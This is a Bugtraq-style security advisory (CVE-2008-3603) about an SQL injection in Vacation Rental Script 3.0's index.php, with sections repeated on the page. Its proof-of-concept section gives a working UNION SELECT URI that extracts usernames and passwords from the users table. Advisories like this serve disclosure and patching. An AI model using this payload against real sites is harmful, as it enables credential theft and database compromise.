Vacation Rental Script 'index.php' SQL Injection Vulnerability
BID:30626
Info
Vacation Rental Script 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 30626 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3603 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 10 2008 12:00AM |
| Updated: | May 07 2015 05:25PM |
| Credit: | CraCkEr |
| Vulnerable: |
vacationrentalscript.com Vacation Rentals Script 3.0 |
| Not Vulnerable: | |
Discussion
Vacation Rental Script 'index.php' SQL Injection Vulnerability
Vacation Rental Script is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input before using it an SQL-query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Vacation Rental Script 3.0 is vulnerable; other versions may also be affected.
Vacation Rental Script is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input before using it an SQL-query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Vacation Rental Script 3.0 is vulnerable; other versions may also be affected.
Exploit / POC
Vacation Rental Script 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?obj=sections&id=-1 UNION SELECT concat(username,0x3a,password) FROM users--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?obj=sections&id=-1 UNION SELECT concat(username,0x3a,password) FROM users--
Solution / Fix
Vacation Rental Script 'index.php' SQL Injection Vulnerability
Solution:
A vendor fix is available. Please contact the vendor for details.
Solution:
A vendor fix is available. Please contact the vendor for details.
References
Vacation Rental Script 'index.php' SQL Injection Vulnerability
References:
References:
- Vacation Rental Script Web Site (vacationrentalscript.com)